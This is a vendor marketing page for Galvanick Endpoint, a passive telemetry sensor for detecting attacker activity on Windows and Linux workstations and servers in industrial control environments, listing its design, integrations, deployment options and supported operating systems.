99% of attacker activity in industrial environments occurs on Windows and Linux endpoints. Most organizations cannot see any of it.
Galvanick Endpoint captures process, file system, and network telemetry from every monitored workstation and server through a fully passive sensor.
The Galvanick endpoint sensor is lightweight software installed on monitored Windows and Linux endpoints at Purdue Model Levels 2 through 3.5: engineering workstations, operator workstations, HMIs, process historians, jump hosts, DCS control servers, and SCADA servers.
User-mode only. Runs entirely above the kernel. Configures built-in OS APIs to produce EDR-style telemetry, then collects and forwards that data.
Telemetry-only by design. Once installed, the sensor does one thing: forward data. No control channel, no inbound command or attack path, no remote modification.
Minimal footprint. All analysis and detection happen off-endpoint. Telemetry terminates at a collector in your environment. Monitored endpoints do not need cloud connectivity.
The Galvanick endpoint sensor covers techniques that target industrial environments specifically, from living-off-the-land techniques to custom malware anchoring on proven behavior-based IoCs. Detections are modeled on historic OT attack campaigns and work immediately upon deployment.
On installation, the sensors not only start detecting for new threats, they also ingest historical logs and apply the full detection catalog retroactively. Attacker activity that occurred months or years before deployment surfaces immediately.
Every Galvanick finding includes the affected endpoint, the user account, the specific process, and a complete timeline of related activity.
Findings include recommended next steps based on the specific threat detected and the observed behavior. Galvanick provides findings in our easy-to-use UI. It can also forward information to your existing SIEM or directly to messaging platforms like Slack, Teams, and Outlook.
Galvanick can also query your operations team directly through your messaging platform to validate observed activity in real time.
EDR tools can deliver the endpoint telemetry OT environments need. The problem is these solutions are inherently risky,
We built the Galvanick endpoint sensor to accommodate any and all OT environments and risk profiles. It provides critical visibility and security coverage without introducing new points of failure.
Galvanick can connect your endpoint telemetry to the tools you already operate. This enriches network security alerts with user and process attribution, utilizes change management records for automated validation of observed activity, and transforms messaging platforms into interactive response channels.
Network security monitoring: Nozomi, Dragos, Forescout, Claroty, or use Galvanick’s own sensor
Infrastructure: Palo Alto Networks, Fortinet, Cisco, and others
Applications: ServiceNow, BMC Remedy, and others
Messaging: Slack, Microsoft Teams, and Outlook
Deploy the Galvanick analytics engine in the cloud or on-premises. Endpoint sensors install in seconds per host with no reboot or internet access required, and do not self-update: Galvanick adheres to your change management process.
Distribute sensor installs on Purdue 2-3.5 endpoints via GPO, SCCM, Intune, network share, or USB for air-gapped environments, and deploy the Galvanick collector as a container image, VM image, or physical appliance.
Galvanick's endpoint sensor supports a range of operating systems:
Windows XP and up
Windows Server 2008 and up
Windows IoT Enterprise 10/11
Linux (Kernel version 2.6.32 and up)
Running something we don't cover yet? We build and prioritize new OS support based on customer needs.